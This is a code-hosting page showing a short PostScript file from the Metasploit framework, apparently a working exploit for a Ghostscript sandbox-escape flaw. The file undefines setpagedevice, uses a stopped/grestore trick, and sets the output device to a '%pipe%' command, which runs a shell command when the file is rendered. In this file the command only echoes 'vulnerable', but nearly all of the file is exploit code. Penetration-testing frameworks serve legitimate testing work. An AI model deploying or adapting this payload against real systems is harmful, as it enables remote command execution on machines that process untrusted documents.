Files
metasploit-gs/data/exploits/ghostscript/msf.ps
T

10 lines
260 B
PostScript
Raw Normal View History

2018-08-30 13:05:29 -05:00
%!PS
userdict /setpagedevice undef
a0
currentpagedevice /HWResolution get 0 (metasploit) put
{ grestore } stopped pop
(ppmraw) selectdevice
mark /OutputFile (%pipe%echo vulnerable > /dev/tty) currentdevice putdeviceprops
{ showpage } stopped pop
quit